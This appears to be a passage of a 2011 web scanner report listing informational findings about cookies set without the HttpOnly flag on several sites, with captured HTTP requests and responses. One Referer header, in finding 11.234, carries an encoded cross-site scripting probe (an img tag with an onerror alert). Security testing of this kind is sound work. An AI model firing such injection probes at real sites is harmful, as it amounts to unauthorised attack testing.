x-internal-browser: MZ17
x-internal-id: 152987262/1226731317/3644782917/4000817842
x-internal-data: MEAV<442707 10 43 3>,MEAV<442707 10 103 18>,MEAV<442707 10 104 12>,MEG:HDWMG<442707 10 116 225>,MEAV<442707 10 116 225>,MGEG:HDWMG<442705 10 116 225>,MGEG:HDWMG<93843 10 116 225>,MEG:HDWMG<442707 10 117 225045>,MEAV<442707 10 117 225045>,MGEG:HDWMG<442705 10 117 225045>,MGEG:HDWMG<93843 10 117 225045>,MEAV<442707 10 118 1>,MEAV<442707 10 280 22>,MCER<442707 47183 10 0>
Cache-Control: no-cache, no-store, max-age=0
Vary: Accept-Encoding
Content-Length: 0
Connection: close
Content-Type: text/html

11.210. http://wow.curse.com/Themes/Common/v6/images/loading.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wow.curse.com
Path:	/Themes/Common/v6/images/loading.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServer=1949253700.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Themes/Common/v6/images/loading.gif HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wow.curse.com

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServer=1949253700.20480.0000; path=/
Cache-Control: max-age=60480000
Content-Type: image/gif
Last-Modified: Thu, 07 Jul 2011 16:24:17 GMT
Accept-Ranges: bytes
ETag: "b172bc51c23ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:51:36 GMT
Content-Length: 4176

GIF89a . ....................................i..B..K..............I.............................4...........v..:..&..*.....r....!.....S.......................... ..$........<.....p...................
...[SNIP]...

11.211. http://wow.curse.com/Themes/Common/v6/images/wow/bkg-box-label.png previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wow.curse.com
Path:	/Themes/Common/v6/images/wow/bkg-box-label.png

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServer=1949253700.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Themes/Common/v6/images/wow/bkg-box-label.png HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wow.curse.com

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServer=1949253700.20480.0000; path=/
Cache-Control: max-age=60480000
Content-Type: image/png
Last-Modified: Thu, 07 Jul 2011 16:24:23 GMT
Accept-Ranges: bytes
ETag: "61682855c23ccc1:0"
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:52:34 GMT
Content-Length: 212

.PNG
.
...IHDR...............t6....tEXtSoftware.Adobe ImageReadyq.e<...?PLTE+p.*o.*p.)l.'h.(j.&f.+q.)m.'h.&g.*o.R..'g.(k.&f.*n.)m.(j.'i.+q..@.....+IDATx... .@ ...E.CE..V.... ....u...e..4~..........h
...[SNIP]...

11.212. http://wow.curse.com/Themes/Common/v6/styles/portals/wow.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wow.curse.com
Path:	/Themes/Common/v6/styles/portals/wow.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServer=1932476484.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Themes/Common/v6/styles/portals/wow.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wow.curse.com

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServer=1932476484.20480.0000; path=/
Cache-Control: max-age=60480000
Content-Type: text/css
Last-Modified: Sat, 11 Sep 2010 03:12:06 GMT
Accept-Ranges: bytes
ETag: "0c7f81c5f51cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:51:55 GMT
Content-Length: 3193

/* wow.css
* Base portal stylesheet for WoW
-------------------------------------------------------------- */

/* ^Header
-------------------------------------------------------------- */
#nav-n
...[SNIP]...

11.213. http://wow.curse.com/Themes/Curse-Wow/Styles/theme.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wow.curse.com
Path:	/Themes/Curse-Wow/Styles/theme.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServer=1949253700.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Themes/Curse-Wow/Styles/theme.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wow.curse.com

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServer=1949253700.20480.0000; path=/
Cache-Control: max-age=60480000
Content-Type: text/css
Last-Modified: Thu, 07 Jul 2011 16:24:31 GMT
Accept-Ranges: bytes
ETag: "485c185ac23ccc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:51:43 GMT
Content-Length: 51

@import "/Themes/Common/v6/styles/portals/wow.css";

11.214. http://wow.curse.com/Themes/Curse-Wow/Styles/theme.css.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wow.curse.com
Path:	/Themes/Curse-Wow/Styles/theme.css.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServer=1949253700.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /Themes/Curse-Wow/Styles/theme.css.aspx HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wow.curse.com

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServer=1949253700.20480.0000; path=/
Cache-Control: no-cache,private
Content-Type: text/css; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
CommunityServer: 4.0.30619.63
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:51:08 GMT
Content-Length: 3148

/* wow.css
* Base portal stylesheet for WoW
-------------------------------------------------------------- */

/* ^Header
-------------------------------------------------------------- */

...[SNIP]...

11.215. http://wow.curse.com/WebResource.axd previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wow.curse.com
Path:	/WebResource.axd

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServer=1949253700.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /WebResource.axd?d=vHo-Q-bP8ZJDmFoP01QaxnjBCsZadfhUtTzvRRP5TlqeEtTngazU4oZOEoDoXKuiY4bc8iVjcvJnsfELIalcUreD9BZn0SylPHOF7B7_ZUpxnUWReMg1yhmdPQ2kMtxAvmSfbPAbMNKPo_8YYv5sUWSvEp-pV5ZmaNaLVtty7S-v4pCw0&t=634372691160000000 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wow.curse.com

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServer=1949253700.20480.0000; path=/
Cache-Control: public
Content-Type: text/javascript
Expires: Sat, 21 Jul 2012 18:58:27 GMT
Last-Modified: Thu, 07 Jul 2011 16:23:51 GMT
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
CommunityServer: 4.0.30619.63
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:51:50 GMT
Content-Length: 4369

function CollapsableArea (varName, parameter, isExpanded, enableDoubleClick, callbackOnCollapse, callbackOnExpand, headerExpandedCssClass, headerCollapsedCssClass, headerProcessingCssClass, enableProc
...[SNIP]...

11.216. http://wow.curse.com/adserver/default.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wow.curse.com
Path:	/adserver/default.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServer=1949253700.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /adserver/default.aspx?ContentName=AdHeader&PortalId=5&PageName=articles.articlesPost&keywords=game%3dwow%2bgroup%3darticles%2bpage%3darticlespost%2bsite%3dwow%2blang%3den HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wow.curse.com

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServer=1949253700.20480.0000; path=/
Cache-Control: no-cache,no-cache
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-AspNet-Version: 2.0.50727
CommunityServer: 4.0.30619.63
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:51:29 GMT
Content-Length: 548

try {

<!--
if (window.adgroupid == undefined) {
window.adgroupid = Math.round(Math.random() * 1000);
}
document.write('<scr'+'ipt language="javascript1.1" src="http://adserver.adtechus.com/addy
...[SNIP]...

11.217. http://wow.curse.com/themes/common/v6/styles/browser/ie7.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://wow.curse.com
Path:	/themes/common/v6/styles/browser/ie7.css

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

BIGipServer=1932476484.20480.0000; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /themes/common/v6/styles/browser/ie7.css HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: wow.curse.com

Response

HTTP/1.1 200 OK
Set-Cookie: BIGipServer=1932476484.20480.0000; path=/
Cache-Control: max-age=60480000
Content-Type: text/css
Last-Modified: Sat, 11 Sep 2010 03:12:06 GMT
Accept-Ranges: bytes
ETag: "0c7f81c5f51cb1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:51:12 GMT
Content-Length: 2089

/* ie7.css
-------------------------------------------------------------- */

/* Header
-------------------------------------------------------------- */

#navigation { z-index: -1; }

/* Fixes qui
...[SNIP]...

11.218. http://www.bing.com/fd/ls/l previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/fd/ls/l

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SRCHD=MS=1870688&SM=1&D=1769857&AF=BMMENO; expires=Mon, 22-Jul-2013 02:08:27 GMT; domain=.bing.com; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.219. http://www.bing.com/search previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.bing.com
Path:	/search

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

_SS=SID=B8C6EB515AE04F898383683B7D3C2EF8; domain=.bing.com; path=/
MUID=E361C23374E642C998D8ABA7166A75EC; expires=Mon, 22-Jul-2013 02:08:25 GMT; domain=.bing.com; path=/
OrigMUID=E361C23374E642C998D8ABA7166A75EC%2c8b890481b4a848de957262672a125e92; expires=Mon, 22-Jul-2013 02:08:25 GMT; domain=.bing.com; path=/
SRCHD=MS=1870688&SM=1&D=1769857&AF=BMMENO; expires=Mon, 22-Jul-2013 02:08:25 GMT; domain=.bing.com; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.220. http://www.burstnet.com/enlightn/8117//3E06/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/8117//3E06/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CMP=193.1G7W^16w.1ETB^19q.1GKj^15X.1F0r^16U.1F0r^1As.1EWG^1AF.1GGd^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Mon, 23-Jul-2012 14:52:40 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.221. http://www.burstnet.com/enlightn/8171//99D2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/8171//99D2/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

CMP=193.1G7W^16w.1ETB^19q.1GKj^15X.1F0r^16U.1F0r^1As.1EWG^1AF.1GKj^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Mon, 23-Jul-2012 14:53:06 GMT; domain=.burstnet.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

HTTP/1.1 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Pragma: no-cache
Cache-Control: no-cache
Content-Type: image/gif
Date: Sat, 23 Jul 2011 14:53:07 GMT
Content-Length: 43
Connection: close
Set-Cookie: CMS=/; path=/; domain=.burstnet.com
Set-Cookie: CMP=193.1G7W^16w.1ETB^19q.1GKj^15X.1F0r^16U.1F0r^1As.1EWG^1AF.1GKj^jx.1Ebs^h2.1Ebs^vO.101Ebs; path=/; expires=Mon, 23-Jul-2012 14:53:06 GMT; domain=.burstnet.com

GIF89a.............!.......,...........D..;

11.222. http://www.capitalone.com/autoloans/before-you-apply.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/autoloans/before-you-apply.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

caponehp=HP73%3ATC00%3Abm%3D2%2C15177; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.223. http://www.capitalone.com/autoloans/redirect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/autoloans/redirect.php

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

caponehp=HP73%3ATC00%3Abm%3D2%2C15177; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com
caponeaf=PFFSRCID%3DS-C1-12345678901-AHP-0401; expires=Sun, 21-Aug-2011 20:44:04 GMT; path=/; domain=.capitalone.com

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.224. http://www.capitalone.com/directbanking/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/directbanking/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

caponehp=HP73%3ATC00%3Abm%3D9%2C15177; expires=Fri, 01-Jan-2010 00:00:00 GMT; path=/; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.225. http://www.capitalone.com/directbanking/online-savings-accounts/interestplus-online-savings-account/open-account/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/directbanking/online-savings-accounts/interestplus-online-savings-account/open-account/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

itc=CAPITALONE11NZZZDN1QSWZD4; expires=Sat, 10-Sep-2011 20:33:15 GMT; path=/; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.226. http://www.capitalone.com/redirect.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/redirect.php

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

itc=CAPITALONE11NZZZDN1QSWZD4; expires=Tue, 20-Sep-2011 20:33:17 GMT; path=/; domain=.capitalone.com

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.227. http://www.capitalone.com/stylesheets/https-common/header.css previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.capitalone.com
Path:	/stylesheets/https-common/header.css

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:

v1st=359592BA2979892B; path=/; expires=Wed, 19 Feb 2020 14:28:00 GMT; domain=.capitalone.com
BIGipServerpl_capitalone.com_80=745088266.29215.0000; path=/

The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

Response

11.228. http://www.kosmix.com/flash/kxcd2.swf previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.kosmix.com
Path:	/flash/kxcd2.swf

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_uc.lptnjy.dpn=ffffffff0904176a45525d5f4f58455e445a4a422634;expires=Thu, 21-Jul-2011 19:24:56 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /flash/kxcd2.swf HTTP/1.1
Host: www.kosmix.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult

Response

HTTP/1.1 301 Moved Permanently
Date: Thu, 21 Jul 2011 19:22:56 GMT
Server: Apache/2.2.15 (Fedora)
Location: http://www.walmartlabs.com
Content-Length: 234
Content-Type: text/html; charset=iso-8859-1
Set-Cookie: NSC_uc.lptnjy.dpn=ffffffff0904176a45525d5f4f58455e445a4a422634;expires=Thu, 21-Jul-2011 19:24:56 GMT;path=/

<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN">
<html><head>
<title>301 Moved Permanently</title>
</head><body>
<h1>Moved Permanently</h1>
<p>The document has moved <a href="http://www.walmartlabs.
...[SNIP]...

11.229. http://www.observer.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.observer.com
Path:	/

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

w3tc_referrer=http%3A%2F%2Fwww.google.com%2Fsearch%3Fsourceid%3Dchrome%26ie%3DUTF-8%26q%3DNew%2BYork%2BObserver; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET / HTTP/1.1
Host: www.observer.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.google.com/search?sourceid=chrome&ie=UTF-8&q=New+York+Observer

Response

11.230. http://www.othersonline.com/partner/scripts/myyearbook/alice.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.othersonline.com
Path:	/partner/scripts/myyearbook/alice.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cd=false; path=/; domain=.othersonline.com; expires=Wed, 16-Apr-2014 18:01:42 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.231. http://www.othersonline.com/partner/scripts/myyearbook/page_parser.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.othersonline.com
Path:	/partner/scripts/myyearbook/page_parser.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

cd=false; path=/; domain=.othersonline.com; expires=Wed, 16-Apr-2014 18:01:47 GMT

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

Response

11.232. http://www.righthealth.com/contextlinks/lifescript.com/cl.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.righthealth.com
Path:	/contextlinks/lifescript.com/cl.js

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992;expires=Thu, 21-Jul-2011 19:37:39 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /contextlinks/lifescript.com/cl.js HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:39 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Tue, 24 May 2011 23:47:55 GMT
Accept-Ranges: bytes
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:22:39 GMT
Vary: Accept-Encoding
Content-Length: 54563
Content-Type: text/javascript
Set-Cookie: NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992;expires=Thu, 21-Jul-2011 19:37:39 GMT;path=/

/* Kosmix ContextLinks - (c) 2009-2011 Kosmix Corp. */
if(!kosmix) var kosmix = {};
kosmix.ContextLinks = {
   Base: function(options) {
   var core = {
       options: {
           donotwant: "img,script,object,embed
...[SNIP]...

11.233. http://www.righthealth.com/external/ads/clo.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.righthealth.com
Path:	/external/ads/clo.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:37:57 GMT;path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /external/ads/clo.gif?pvid=1617684726&cd=lifescript.com&d=http%3A//www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx%3Futm_source%3Doutbrain%26utm_medium%3Dcpc%26utm_campaign%3DADHD_Adult&cache=1311276182032 HTTP/1.1
Host: www.righthealth.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://www.lifescript.com/Health/Conditions/ADD/How_to_Quiet_the_Symptoms_of_Adult_ADHD.aspx?utm_source=outbrain&utm_medium=cpc&utm_campaign=ADHD_Adult
Cookie: kid=09814286-B362-7915-D795-6E62A45FA162; __qca=P0-228604088-1305663651363; __utmz=168930850.1305663651.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/4; as=seo_all; __utma=168930850.1022900435.1305663651.1305663651.1305663651.1; NSC_lbpt.lptnjy.dpn=ffffffff090417b245525d5f4f58455e445a4a423992

Response

HTTP/1.1 200 OK
Date: Thu, 21 Jul 2011 19:22:57 GMT
Server: Apache/2.2.15 (Fedora)
Last-Modified: Wed, 15 Sep 2010 16:51:18 GMT
Accept-Ranges: bytes
Content-Length: 43
Cache-Control: max-age=14400
Expires: Thu, 21 Jul 2011 23:22:57 GMT
Content-Type: image/gif
Set-Cookie: NSC_hbnnb.lptnjy.dpn=ffffffff0904166145525d5f4f58455e445a4a423990;expires=Thu, 21-Jul-2011 19:37:57 GMT;path=/

GIF89a.............!.......,...........D..;

11.234. http://www.silverlight.net/getting-started previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.silverlight.net
Path:	/getting-started

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

SilverlightFirstVisit3=LastVisited=GettingStarted; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /getting-started HTTP/1.1
Host: www.silverlight.net
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://social.msdn.microsoft.com/search/en-US?query=84e17%3cimg%2520src%253da%2520onerror%253dalert%281%29%3e8704c19d382%3d1

Response

HTTP/1.1 200 OK
Cache-Control: private
Content-Length: 12265
Content-Type: text/html; charset=utf-8
Vary: Accept-Encoding
Server: Microsoft-IIS/7.0
X-Umbraco-Version: 4.7
X-AspNet-Version: 4.0.30319
Set-Cookie: SilverlightFirstVisit3=LastVisited=GettingStarted; path=/
X-Powered-By: ASP.NET
X-Powered-By: ARR/2.5
X-Powered-By: ASP.NET
Date: Sat, 23 Jul 2011 04:46:39 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<title>Home: Si
...[SNIP]...

11.235. http://www.socialirl.com/storage/Social-IRL-Logofor-Squares.gif previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.socialirl.com
Path:	/storage/Social-IRL-Logofor-Squares.gif

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:

WebPersCookie=3hccqxzi6sLT5Se88w7usH+6wdXqHnz2M7Kh3ONjUGlD50TnK7NyX21bycI20Xe+69aOACy3n/WuS7E=; path=/

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /storage/Social-IRL-Logofor-Squares.gif HTTP/1.1
Host: www.socialirl.com
Proxy-Connection: keep-alive
Referer: http://corp.klout.com/blog/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.30 (KHTML, like Gecko) Chrome/12.0.742.122 Safari/534.30
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
